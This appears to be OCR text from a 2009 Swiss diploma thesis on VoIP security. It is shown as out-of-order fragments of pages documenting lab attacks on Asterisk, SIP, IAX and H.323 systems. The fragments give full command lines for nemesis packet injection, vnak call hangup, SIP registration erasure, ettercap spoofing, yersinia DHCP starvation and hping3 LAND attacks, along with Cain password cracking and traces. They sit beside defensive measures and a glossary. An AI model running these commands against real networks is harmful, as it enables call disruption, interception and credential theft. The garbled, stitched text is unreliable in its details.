308. ommen auch wenn diese zum Beispiel am Schluss noch mit zwei Zahlen versehen werden z Bsp Spanien08 UNSICHER Sichere Passw rter enthalten Sonderzeichen Gross und Kleinschreibung ergeben keinen Sinn und sind mindestens 8 Zeichen lang Sichere Passw rter stehen auch nicht irgendwo auf einem Post it Nachrichtenzettel unter dem Telefonieterminal oder der PC Tastatur Siehe Massnahmen Asterisk und Verschl sselung Kapitel 8 2 1 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 90 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 3 4 2 Technik und Funktionsweise Digest Authentification Der Asterisk Proxy Server verlangt eine Registrierung mittels MD5 gehashtem Passwort der IAX Clients Dieses Verfahren ist die meist eingesetzte Authentifizierung bei Asterisk Proxy Servern Auf einen Registrierungs Request eines IAX Clients sendet der Asterisk Proxy Server diesem einen Challenge Nonce zur ck Der IAX Client hat mit diesem Challenge einen MD5 Hashwert zu bilden den er wieder an den Asterisk Proxy Server zur ck senden muss Zur Bildung dieses Hashwertes werden bei IAX IAX2 lediglich das Passwort und der Challenge verwendet Schematisch sehr vereinfacht sieht dies wie folgt aus Challenge Passwort MD5 Hashwert Da der Hashwert und der Challenge in Klartext ber das Netzwerk gesendet werden i
309. on Tool 4 Anwendung Tool 4 Nemesis ist in BackTrack3 enthalten Erforderliche Vorkenntnisse 5 Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2 iSEC Registration Reject ist ein vordefiniertes IP Paket welches mit Gefahrenpotential Hilfe von nemesis zum Angriffsziel gesendet wird 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 5 Ziel Angriff Analyse Der Angriff zielt auf die Verf gbarkeit der Endpoints ab Der Angreifer sendet dabei einem am Gatekeeper registrierten Endpoint eine Registration Reject Nachricht um dessen Registrierung am Gatekeeper zu l schen Dadurch ist dieser Endpoint f r ankommende Anrufe nicht mehr erreichbar Schutz gegen Angriff Analyse Siehe Massnahmen Substandards H 235 1 bis H 235 5 und H 235 9 Kapitel 8 3 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 110 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 4 4 2 Technik und Funktionsweise In H 323 wird keine Authentifizierung verlangt um einem fremden Endpoint eine Registration Reject Nachricht zu senden Dies erlaubt es einem Angreifer ohne besondere Authentifizierung einem Endpoint die Registrierung zu l schen Ab diesem Zeitpunkt ist dieser Endpoint f r ankommende Rufe nicht mehr erreichbar Er wird sich dann aber periodisch wieder versuchen
310. on wire 50 bytes captured Ethernet II Src Aastra_19 93 a7 00 08 5d 19 93 a7 Dst Dell_f0 22 43 00 14 22 f0 22 43 Internet Protocol Src 10 1 1 129 10 1 1 129 Dst 10 1 1 101 10 1 1 101 version 4 Header length 20 bytes Differentiated Services Field 0x00 DSCP 0x00 Default ECN Total Length 36 Identification 0x00 0x00 Oxb04a 45130 Flags 0000 0010 00 14 22 fO 22 43 00 08 5d 19 93 a7 08 OO 45 O00 00 24 bO 4a 00 00 ff 11 f4 96 Oa 01 01 81 Oa Ol leleysemOl 65 39 Se 39 Je 00 10 03 12 81 cb 00 Oc 5d 19 0030 ESET Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 131 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Leider hat dieser Angriff nicht zum Erfolg gef hrt Das Paket wurde vom Angriffsziel weder abgewiesen noch korrekt ausgewertet Deshalb wurde derselbe Angriff noch einmal ausgef hrt jedoch in die andere Richtung Das heisst diesmal wurde versucht dem User Agent 4129 im Namen vom Asterisk Proxy Server die RTCP BYE Nachricht zu senden Shell nemesis nemesis udp x 3000 y 3000 S 10 1 1 101 D 10 1 1 129 H 00 14 22 f0 22 43 M 00 08 5d 19 93 a7 P i a SEC RTCP BYE DOS v UDP Packet Injection The NEMESIS Project Version 1 4 Build 26 MAC 00 14 22 F0 22 43 gt 00 08 5D 19 93 A7 Ethernet type IP 0x0800 IP 160 252 101 gt 710 1 1 129 IP ID 52884 IP Proto UDP 17 IP TIL 255 IP TOS 0
311. onen Ansicht Anwendungen Prozesse Systemleistung Netzwerk Benutzername a 8x0 wuaucl exe taskmar exe stefan o0 Auch wurde die Verbindung zum PBX Manager PRO durch den Absturz von Asterisk getrennt Dieser PBX Manager erleichtert die Programmierung und Konfiguration der PBX Asterisk dank seiner graphischen Benutzeroberfl che GUI Graphical User Interface WillVoice PBX MANAGER PRO Main Tools Admin Help Dec 22 20 Dec 22 20 3 3 40 WARNING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer 48 WARHING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 40 WARNING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 40 WARNING 3632 chan sip t 711504 sipsock read Recv error Connection reset by peer Dec 22 20 33 48 WARNING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 40 WARMING 3632 chan sip c 11964 sipsock read Recv error Connection reset by peer Dec 22 20 33 41 WAPHING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 48 WARHING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 40 WARHING 3632 chan sip c 11564 sipsock read Recv error Connection reset hy peer Dec 22 20 33 40 WARNING 3632 chan sip c 11564 sipsock read Recv error Connection reset by peer Dec 22 20 33 40 WARNING
312. ood Kapitel 8 5 12 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 172 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 11 2 Technik und Funktionsweise Ein TCP Verbindungsaufbau eines Hosts zu einem Server geschieht in drei Schritten Dreiwege Handshake 1 Der Host sendet ein Paket mit SYN Flag an Server und ussert dadurch sein Verbindungswunsch 2 Server best tigt diese Anfrage und sendet dem Host einPaket mit den Flags SYN ACK zur ck 3 Damit die Verbindung definitiv hergestellt wird muss der Host die zuvor erhaltene Best tigung dem Server zur ckbest tigen Erst jetzt wird die Verbindung Host Server hergestellt Client Server Syn Segzy a A oA apt se EN ack 7 Zah y4 77 1 segsyy gt Bildquelle http de wikipedia org w index php title Datei 300px Tcp handshake png amp filetimestamp 2005 1221162333 Der Angreifer welcher die Pakete mit den gesetzten SYN Flags Schritt 1 an den Server sendet verwendet mit jeder Anfrage eine andere gespoofte IP Adresse Der Server welcher auf die SYN Anfragen antwortet Schritt 2 wartet einige Zeit bis das der anfragende Host diese Antwort zur ckbest tigt Schritt 3 In dieser Wartezeit l sst der Server diese Verbindungsanfrage als halboffene Verbindung stehen Da die Antworten zum Server ausbleiben
313. orcht das Netzwerk ab als Angriffsziel wurde IAX Client 4131 mit der IP Adresse 10 1 1 151 gew hlt IAX Client 4131 ist mit User Agent 4111 in einer Verbindung vnak detektiert die Gespr chsverbindung und schl gt zu Damit der Angreifer die im Netzwerk ausgetauschten Nachrichten empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitell 4 Bemerkung Obschon vnak nicht in BackTrack3 enthalten ist wird es aus dem Terminalfenster von BackTrack3 heraus gestartet Vnak wurde zuvor nach BackTrack3 herunter geladen entpackt und kompiliert BackTrack3 bietet eine Menge vorinstallierter Pakete und Hilfsprogramme die f r viele Angriffe zwingend n tig sind Somit bietet BackTrack3 eine vorinstallierte Basis f r weitere linuxbasierte Angriff Tools welche selbst nicht in BackTrack3 enthalten sind Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet Vvnak py a 2 iethO 10 1 1 151 10 1 1 101 Die Werte im Einzelnen stehen wie folgt f r vnak py Aufruf Tool in Python Umgebung a2 Es soll die Hangup Attacke von vnak ausgef hrt werden ethO Besagt tiber welche Schnittestelle des PC s die Daten gesendet werden sollen 10 1 1 151 IP Adresse des Zielobjektes an welche die gespoofte Antwort gesendet wird 10 1 1 101 IP Adresse des Asterisk Proxy Servers oh ok bt vnak py a 2 iethO 10 1 1 151 10 1 1 101 vnak VoIP Network
314. orts monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 65535 hosts for scanning Scanning the whole netmask for 65535 hosts N Am Ende des Scan Vorganges werden die im Netzwerk gefundenen aktiven Hosts im Tab Hosts Host List angezeigt Es ist mit der linken Maustaste auf die IP Adresse das Angriffsziels zu klicken und Add to Target 1 auszuw hlen In diesem Beispiel wird dies f r die IP Adresse 10 1 1 129 getan Da dieses Angriffsziel nicht direkt mit dem Gespr chspartner sondern immer ber den Asterisk Proxy Server mit diesem kommuniziert wird als Target 2 die IP Adresse 10 1 1 101 gew hlt Somit werden die Daten von User Agent 4129 zum Asterisk Proxy Server und umgekehrt alle ber den PC des Angreifers gelenkt ercap Start Targets Hosts View Mitm Filters Logging Plugins Help Host List gt IP Address MAC Address Description f 10 1 1 121 00 08 5D 19 40 8F gt 1 151 00 1C C0 07 F3 50 1 201 00 08 5D 82 10 E8 T m 10 1 129 00 08 5D 19 93 A7 10 1 10 1 10 1 241 00 1E EC 0B AD 96 Delete Host Add to Target 1 Add to Target 2 2183 known services Randomizing 65535 hosts for scanning Scanning the whole netmask for 65535 hosts 10 hosts added to the hosts list Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 136 vo Berner Fachhochschule Technik und Informatik Software Schule Sch
315. otential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel 2 Ziel Angriff Analyse Bei der Enumeration geht es dem Angreifer darum im ganzen Ziel Netzwerk so viele Informationen ber die angeschlossenen IAX Clients Hard oder Softphones Registrars Proxy Server und Redirect Server zu erhalten wie es berhaupt m glich ist Die Enumeration steht meist an Anfang weiterer Angriffe welche jedoch erst mit den aus der Enumeration gewonnen Kenntnissen m glich sind Schutz gegen Angriff Analyse Eine wirksame Schutzmassnahme ist schwierig zu realisieren denn die Ports m ssen f r die korrekte Funktionalit t offen bleiben Einzige m gliche Massnahmen sind Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen IDS Kapitel 8 5 15 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 85 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 3 2 2 Technik und Funktionsweise Die IAX Enumeration basiert auf Registrierungsversuche vermeintlicher User Agents Wenn eine Authentifizierung der User Agents gegen ber dem Asterisk Proxy Server verlangt wird so sendet der User Agent bei seiner Registrierungsanfrage den Benutzernamen und das Passwort mit Der Asterisk Proxy Server antwortet auf solche Anfragen unterschiedlich je nachdem ob es einen giiltigen Account dafiir gibt oder nicht Somit kann leicht festgestellt werden
316. pcap Version 4 0 0 1040 Current network adapter Device NPF_ BE0913C0 67D3 4228 3762 77A2532F62A0 r IP Spoofing Spoofed source address MAC Spoofing Use Real MAC address Use Spoofed MAC address sTerm v1 6 mao Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 159 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Ein nochmaliger Verbindungsaufbau des Angreifers sieht jetzt anders aus Dank der gespooften IP Adresse ist ihm jetzt Zugang zur Managementkonsole gew hrt pon File View Heb Configure Tools 3S 2 O Commected to 10 1 1 191 impersonating 10 1 1 190 Der akzeptierte Zugang aufgezeichnet mit Wireshark In Paket Nr 42 sendet der Switch sofort ein SYN ACK zur ck und best tigt dem Angreifer seine Anfrage welche er in Paket Nr 41 gesendet hatte Trace gespoohte IP 190 pcap a File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 39 1 0 40U DEI I_TU 22 43 broaacast ARP wno nas LU 1 1 19U7 I Il LU L 1L LUL 40 18 782248 Cimsys_33 44 55 BayNetwo_65 49 8b ARP 10 1 1 190 is at 00 11 22 33 44 55 41 18 887871 10 1 1 190 10 1 1 191 TCP 13167 gt telnet SYN Seq 0 win 4096 Len 42 18 893251 10 1 1 191 10 1 1 190 TCP Seq 0 Ack 1 W 43 18 919590 10 1 1 190 10 1 1 191 TCP gt telnet ACK Seq 1 Ack 1 win 40 44 18 935873 10
317. plugin stopped ctivating stp_mangler plugin tp_mangler Start sending Fake STP packets al Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 148 e0 oo Berner Fachhochschule Technik und Informatik Software Schule Schweiz In Paket Nr 152 ist eine gespoofte BPDU Nachricht zu sehen welche vom Angreifer aus gesendet wurde Die MAC Adresse 02 le e5 d5 ec 49 ist diejenige der Netzwerkbr cke Es ist zu sehen dass Ettercap als Pfadkosten 0 einsetzt Um den Switch mit den tiefsten Pfadkosten zu bleiben wird das gespoofte Paket alle 2 Sekunden wiederholt Somit wissen die anderen Switche auch dass es diesen Pfad noch gibt ansonsten w rde wieder eine Neuberechnung des Spanning Tree stattfinden Trace pcap Wireshark Eile Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply Protocol Info r bridges _00 STP conf oges Destination Sp Source 2 MS NLB PhysServer 30_ Spanning tree fol 4 NLB Phvysserver 30 anning tree t Root it tle e5 d5 ec 49 Cost 152 JAR 897707 MS NI R PhvsServer Nn Anninn tree fnr hrirlnas NN STP Cant Rant m I Eg of teresASrer 49 Cast I D gt x Sn Frame 152 60 bytes on wire 60 bytes captured IEEE 802 3 Ethernet Logical Link Control S Spanning Tree Protocol Protocol Identifier Spanning Tree Protocol 0x0000 Protocol version Id
318. poofte RTCP BYE Nachrichten zu versenden Es hat somit die Kontrolle welche Verbindungen er wann kappen will Kann der Angreifer den Netzwerkverkehr an einem neuralgischen Punkt wie bei einem Gateway oder vor dem SIP Proxy Server VOIP PBX berwachen ist er Herr ber alle Gespr chsverbindungen in diesem Betrieb Durch seine Angriffe kann er den Telefoniebetrieb vollst ndig berwachen respektive zum Erliegen bringen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 132 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 6 Angriffe auf der Netzwerkebene Einf hrung Neben den Angriffen auf die VOIP Protokolle selbst k nnen weitere Schwachstellen ausgenutzt werden um VOIP Systeme zu komprimitieren Die VOIP Telefonie liegt der IP Protokollfamilie zugrunde nutzt also genau gleich wie der Datenverkehr IP TCP und UDP Somit lassen sich die bekannten Angriffsm glichkeiten der IT Infrastruktur auch gegen die VOIP Infrastruktur anwenden VOIP wird meistens in einem Shared Medium betrieben das heisst VOIP teilt sich das Netzwerk mit dem Datenverkehr der daran angeschlossenen Rechner Es werden vielfach auch dieselben Komponenten genutzt wie zum Beispiel Switche Router oder Gateways Diese gemeinsame Nutzung gibt dem Angreifer zus tzliche M glichkeiten um Angriffe direkt auf die VOIP Infrastruktur ausf hren zu k nnen So kann auch jede Komponente im Netzwerk ein potentielles Ang
319. r eine bestimmte Information kennt Es wird u a h ufig eingesetzt um das 19 02 2009 Berner Fachhochschule Technik und Informatik Software Schule Schweiz http de wikipedia org wiki Advance d_Encryption_Standard http www pcnetzwerke de netzwer kglossar html a http de wikipedia org wiki ARP Spoofing http www aastra ch http de wikipedia org wiki Asterisk _ Telefonanlage http de wikipedia org wiki Authentif izierung http de wikipedia org wiki Autorisie rung http de wikipedia org wiki BackTra ck http de wikipedia org wiki Spannin g_Tree_Protocol http de wikipedia org wiki Brute_fo rce_attack http de wikipedia org wiki Cain 2 6Abel http de wikipedia org wiki Challeng e Response Verfahren S Sch r MAS 06 02 20 Seite 199 Credentials DHCP Spoofing DHCP Starvation Dictionary Attacke DoS Denial of Service Downgrade Attacke Endpoint Enumeration Ettercap Fail Open Mode Flooding Diplomarbeit VOIP Security Zustellen unerw nschter E Mails Spam zu verhindern Ein Berechtigungsnachweis engl credential ist ein Instrumentarium das einem System die Identit t eines anderen Systems oder eines Benutzers best tigen soll Dies geschieht meist in Form einer Benutzerkennung in Verbindung mit einem Authentifizierungsmerkmal DHCP kann leicht gest rt und manipuliert werden weil DHCP Clients jeden DHCP Server akzeptieren Ein Angreifer kan
320. r im Switch noch keine IP Security vorhanden Diese wurde erst nachtr glich wie folgt definiert Zugriff zur Managementkonsole ist nur via IP Adresse 10 1 1 190 m glich Somit st nde in der Realit t dann in obigen 2 Aufzeichnungen als Client IP Adresse nicht 10 1 1 101 sondern 10 1 1 190 denn dies w re ja der definierte Administrator der als alleiniger Zugang zur Managementkonsole h tte Der Angreifer weiss vorerst nicht dass ihm nur mit einer bestimmten IP Adresse Zugang zur Managementkonsole gew hrt wird und versucht mit seiner IP Adresse eine Telnet Session zum Switch aufzubauen Er wird vom Switch abgewiesen gt Access Denied Fie Vew Configure Tools Help 33 a OF sTerm vi 7 by mao n Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 158 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz Im Wireshark Trace ist die Zugriffsverweigerung des Switches in Paket 49 zu sehen Der Switch beendet die Session sofort wieder mit einen FIN Paket an den Angreifer Fite Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info wy LU LUVALI vayncLnV_Us r7 00 eee ELN nnr AUVs Ls er LIL 19 AL VUS YY UL UJI Ou 205591 Dell_f0 22 43 Broadcast ARP who has 10 1 1 199 Tell 10 1 1 101 206001 Compal n_0b ad 96 Dell_f0 22 43 ARP 10 1 1 199 is at 00 1e e 96 224914 2 Cimsys_33 44 55 BayNetwo_
321. ration eines User Agents l schen 2 10 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt die Registrierung des User Agents 4111 zu l schen so dass dieser f r ankommende Gespr che nicht mehr erreichbar sein wird Im Terminalfenster von BackTrack3 werden das Tool und der Angriff mit folgenden Argumenten gestartet erase_registrations ethO 4111 10 1 1 101 10 1 1 121 Die Argumente im Einzelnen stehen wie folgt f r erase_registrations spricht das Tool an startet es und bergibt nachfolgende Werte ethO definiert die Schnittstelle ber welche die Nachricht gesendet werden soll 4111 User Agent dessen Registrierung gel scht werden soll 10 1 1 101 SIIP Proxy Server Registrars zu dem die Nachricht gesendet werden soll 10 1 1 121 IP Adresse des Terminals des User Agents Angriffsziel Die beiden untenstehenden BAE Contact und Expires 0 sind f r das L schen der Registrierung verantwortlich kkk erase_registrations Version 1 0 Feb 24 2006 Usage Mandatory interface e g eth0 target user e g or john doe or 5000 or 1 210 555 1212 IPv4 addr of target domain ddd ddd ddd ddd IPv4 addr of target proxy registrar ddd ddd ddd ddd Optional h help print this usage v verbose output mode bt erase_registrations ethO 4111 10 1 1 101 10 1 1 121 erase_registrations Version 1 0 Feb 24 2006 targeted User Agent IPV4 Addr 4111 10 1 1 121 at proxy IP
322. rbereiteten Vorlage RTP Paket iSEC RTP Flood DOS erstellen zu k nnen Danach wird der Angriff mit folgende Argumenten aus nemesis heraus gestartet nemesis udp x 14750 y 14750 S 10 1 1 129 D 10 1 1 101 H 00 08 5d 19 93 37 M 00 14 22 f0 22 43 P iSEC RTP Flood DOS v Die Werte im Einzelnen stehen wie folgt f r nemesis udp Startet nemesis modus UDP x 14750 ber welches Port die Meldung abgesetzt werden soll y 14750 An welches Port die Meldung gesendet werden soll ersnifft mit Portscanner S IP Adresse des zu spoofenden Clients Servers D Angriffsziel H MAC Adresse des zu spoofenden Clients Servers M MAC Adresse des Zielobjektes P iSEC RTP Flood DOS Integration Vorlage RTP Paket KKK bt nemesis udp x 14750 y 14750 S 10 1 1 129 D 10 1 1 101 H 00 08 5d 19 93 a7 M 00 14 22 f0 22 43 P iSEC RTP Flood DOS v UDP Packet Injection The NEMESIS Project Version 1 4 Build 26 MAC 00 08 5D 19 93 A7 gt 00 14 22 F0 22 43 Ethernet type IP 0x0800 IP 10 1 1 129 gt 10 1 1 101 IP ID 48060 IP Proto UDP 17 IP TTL 255 IP TOS 0x00 IP Frag offset 0x0000 IP Frag flags UDP Ports 14750 gt 14750 Wrote 214 byte UDP packet through linktype DLT_EN10MB KKK Paket Nr 2764 ist eines der gespooften RTP Pakete welche vom Angreifer an das Angriffsziel Asterisk Proxy Server gesendet wurden Zu sehen ist dass die IP und MAC Adresse gespooft im Namen von User Agent 4129 an das Angriffsziel gesen
323. re Protokolle wie H 323 immer mehr vom Markt verdr ngen Bez glich SIP sind die Angriffe durch den Diplomanden selbst zu bestimmen Wichtig dabei ist dass die Sicherheitsmerkmale Integrit t Verf gbarkeit und Vertraulichkeit bei diesen Angriffen ber cksichtigt werden Stefan Sch r Die Protokolle IAX und H 323 sind ebenfalls zu analysieren und zu testen ihnen wird aber im Rahmen dieser Diplomarbeit deutlich weniger Beachtung geschenkt als dem SIP Protokoll Stefan Sch r Die Protokolle RTCP und SDP sind Subprotokolle von RTP respektive SIP welche die Eigenschaften der Medienstr me hinsichtlich Gespr chsqualit t regeln Daher ist Verbreitung eher gering was das Vorhandensein bestehender Angriff Tools gegen diese Protokolle betrifft Hinsichtlich den obigen Priorit ten und dem zeitlichen Rahmen der Diplomarbeit werden diese zwei Protokolle nicht getestet MGCP und Megaco sind Protokolle f r Master Slave Anwendungen welche haupts chlich im Backbone Bereich von Fernnetzbetreibern eingesetzt werden Infolge der grossen Sicherheitsvorkehrungen in diesen Bereichen machen solche Angriffe keinen Sinn Daher sind auch nicht wirklich viele brauchbare Angriff Tools im Internet auffindbar Hinsichtlich den obigen Priorit ten und dem zeitlichen Rahmen der Diplomarbeit wird dieses Protokoll nicht getestet Termin 19 2 2009 19 2 2009 RTP ist das Protokoll ber welches die Sprachdaten gesendet werden Fast ausnahmslos bei al
324. recorded audio to the next audio packet captured from the target audio stream There will be no further printed output until pre recorded audio playback has completed Since the audio to mix is 3 26 sec in length the tool has failed if greater than about 3 26 seconds elapse without a completion confirmation In all likelihood failure to begin mixing audio or failure to complete the mixing once it has begun means the target audio stream is no longer available to drive the mixing loop e g the targeted call has ended or changed state It s also possible you re attempting to run the tool on a very slow or very heavily loaded machine Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 123 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Mixing interlacing the pre recorded audio with the target audio stream has completed closing live pcap interface destroying libnet handle closing socket used to obtain device MAC addr bt KKK Paket Nr 15035 zeigt dass die eingeschleusten Sprachpakete mit der gespooften IP Adresse des Asterisk Proxy Servers an das Angriffsziel gesendet wurden Die MAC Adresse kann belassen werden denn RTP pr ft diese in keinster Weise was die Sicherheit anbelangt Der Angriff wurde erfolgreich ausgef hrt das Angriffsziel User Agent 4115 h rte ein lautes Lachen als Hintergrundger usch w hrend er sich inmitten eines Gespr ches mit User Agent 4119 b
325. responder Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert X X X Ziel Angriff Analyse IRDP Pakete ICMP Router Discovery Protocol informieren Hosts und Server ber den zust ndigen Gateway im Netzwerk Mit dem Spoofen solcher IRDP Pakete gelingt es dem Angreifer den Datenstrom der Angriffsziele umzulenken Dadurch k nnen die Datenstr me zum Beispiel ber den PC des Angreifers einen selbst eingebrachten Gateway oder zu einem nichtexistierenden Ziel DoS Angriff umgeleitet werden Ziel dieses Angriffs k nnen s mtliche VOIP Komponenten im Netzwerk sein Schutz gegen Angriff Analyse Siehe Massnahmen IRDP Spoofing Kapitel 8 5 9 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 161 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 8 2 Technik und Funktionsweise Damit IRDP Nachrichten an Hosts und Server gesendet werden k nnen m ssen diese auf DHCP eingestellt sein Das Ziel von IRDP Nachrichten ist automatisch den Hosts einen Default Gateway einzutragen ohne dass dies dabei aufw ndig manuell bei jedem Host vor Ort getan werden muss Das IRDP Protokoll arbeitet
326. resse und das Soucre Port identisch mit der Ziel IP Adresse und dem Ziel Port sind Das SYN Paket wird an ein offenes Port des Angriffsziels gesendet worauf dieses mit einem SYN ACK antwortet Da die Source und Quell IP Adresse wie auch deren Ports identisch sind antwortet sich der Port selber Fehler im TCP IP Stack f hren dazu dass diese SYN ACK Antwort vom Port als ein neues SYN Paket interpretiert wird worauf sich das Port wieder selbst eine SYN ACK Antwort sendet Dieser Vorgang geht dann immer so weiter bis die Ressourcen des sich selber aufrufenden Rechners v llig ersch pft sind Oftmals ist ein Systemabsturz die Folge dieser Auslastung 1997 trat diese Art von Attacken zum ersten Mal auf Mittels Korrekturen und Implementierungen wurde diese Sicherheitsl cke dann f r eine gewisse Zeit geschlossen Im Jahre 2005 wurde durch Attacken bekannt dass dieser Angriff durch weitere Fehlimplementierungen des TCP IP Stacks wieder gegen folgende Systeme gemacht werden kann Windows XP SP2 Windows 2003 Bemerkung Die meisten heutigen VOIP Server werden unter Windows 2003 Betriebssystemen betrieben 6 12 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer beabsichtigt den Asterisk Proxy Server mittels einer LAND Attacke anzugreifen Sein Ziel ist es die Verf gbarkeit der ganzen Telefonieinfrastruktur zu stoppen Im Terminalfenster von BackTrack 3 wird hping3 gestartet und der Angriff mit folgenden Argumenten ausg
327. rfen werden 6 Oft handelt es sich um eine Zufallszahl oder Pseudozufallszahl eines m glicherweise kryptografisch sicheren Generators Nonces werden beispielsweise benutzt um Replay Attacken oder Man In The Middle Angriffe zu verhindern Es wird versucht anhand gesniffter Informationen R ckschluss auf das Passwort zu erhalten So kann zum Beispiel ein ersniffter MD5 Haswert mittels Dictionary Attacke zum urspr nglichen Passwort f hren Eine Telefonanlage ist eine Vermittlungseinrichtung die mehrere Endger te wie zum Beispiel Telefon Fax Anrufbeantworter sowohl untereinander als auch mit dem ffentlichen Telefonnetz verbindet Der grunds tzliche Funktionsbestandteil zum Erf llen dieser Aufgabe ist das Koppelfeld dessen Ein und Ausgangskan le durch ein Steuerwerk geschaltet werden Das Opfersystem wird mit gr tm glicher Geschwindigkeit mit echo request Paketen also ping belastet Das Opfersystem ist fast ausschlie lich damit besch ftigt darauf zu antworten und kommt seinen eigentlichen Aufgaben nicht mehr nach Werden diese Attacken auf VoIP Komponenten ausgef hrt so kann es zu erheblichen Betriebsst rungen bzw zum Totalausfall der Kommunikation kommen Ein Portscanner ist eine Software mit der berpr ft werden kann welche Dienste ein mit TCP IP oder UDP arbeitendes System anbietet Der Portscanner nimmt dem Anwender dabei die Arbeit ab das Antwortverhalten eines Systems selbst mit einem Sniffer zu untersuche
328. rfolgreicher Suche des Passwortes wird die Attacke automatisch gestoppt a Oc Re o 3 UmBESOLE HT i E Decoders WD Network Wp snitter 7 Cracker CO Traceroute MM cco W Wireless Eh Query Cracker a Realm User Name Password URI Nonce Response Method Type A LMA NTLM Hast 9 asterisk 4119 sip10 11101 7dc5e589 4260ce779863b REGISTER MD5 IM NTLMv2 Hashes AR MS Cache Hashe amp PWL files 0 IE Cisco IOS MD5 H IE Cisco PIX MD5 H P APOP MDS Hashi CRAM MD5 Hash ef OSPF MDS Hashe ef RIPV2 MD5 Hashe f VRRP HMAC Has Rd VNC 3DES 0 md MD2 Hashes 0 md MD4 Hashes 0 Dictionary Position aA see I Lowercase PASSWORD password i S 17 Uppercase Password PASSWORD sya SHA 2 Hashes 0 T Num sub pe ms Pass P4ss Pa5s P45s P455 R RIPEMD 160 Hast Current password I Case perms Pass ptss paSs PaSs PASS 8 Kerb5 PreAuth Ha T Two numbers Hybrid Brute Pasefl PassS9 BB Radius Shared Ke 65 IKE PSK Hashes C Dictionary Attack Dictionary Fie Position Y C Users stelan Diplomarbet VooSec Angiilfe woitiste 60492187 Key Rate Options IV Ae ls Password 7 Reverse PASSWORD DROWSSAP 7 Double Pass PassPass Plaintext of user 4119 is nallorca ff MSSQL Hashes 0 Attack stopped D MySQL Hashes 0 1 of 1 hashes cracked N Ebenfalls wird im Tab Cracker das entschl sselte Passwort zum entsprechenden Eintrag hinzugef gt Diplomarbeit VOIP Security 19 02
329. rg xid arg secs arg flags arg ci ar yi arg si arg gi arg ch arg interface arg h This help scree M Disable MAC address spoofing as parameter argument if you would like to display the parameter help the man page for a full list of options and many examples amp suggestions to the Yersinia developers lt yersinia yer MOTD Waiting for my surround speakers Audiovector Mil Signature yersinia dhcp interface ethO attack 01 lt gt Starting DOS att ending DISCOVER packet lt gt Press any key to stop the attack lt gt MOTD I m so 31337 that I can pronounce yersinia as yersiiiniiiiaaaa Shell IRDP E Shell Yersin Shell Yers Remote Exp jy Remote Exp 1 2 Hoss eJ 725 In jedem DHCP Discover der von yersinia aus gesendet wird steht eine unterschiedliche MAC Adresse In den DHCP Offer Paketen wie zum Beispiel Paket Nr 43739 wird yersinia eine IP Adresse vom DHCP Server zugeteilt Das Gefahrenpotential von Yersinia ist gut zu erkennen nicht mal zu Beginn des Angriffes vermag der DHCP Server infolge der enorm vielen Anfragen der von yersinia gesendeten DHCP DISCOVER Pakete alle zu beantworten WY OCHP Trace pcap Wirechark _ lt _LLLLL File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Source Destination Protocol Info 43 206 6648569 U U U U 299 299 295 255 DHCP DHCP Discover Transaction ID Ux836c4Ue 43727
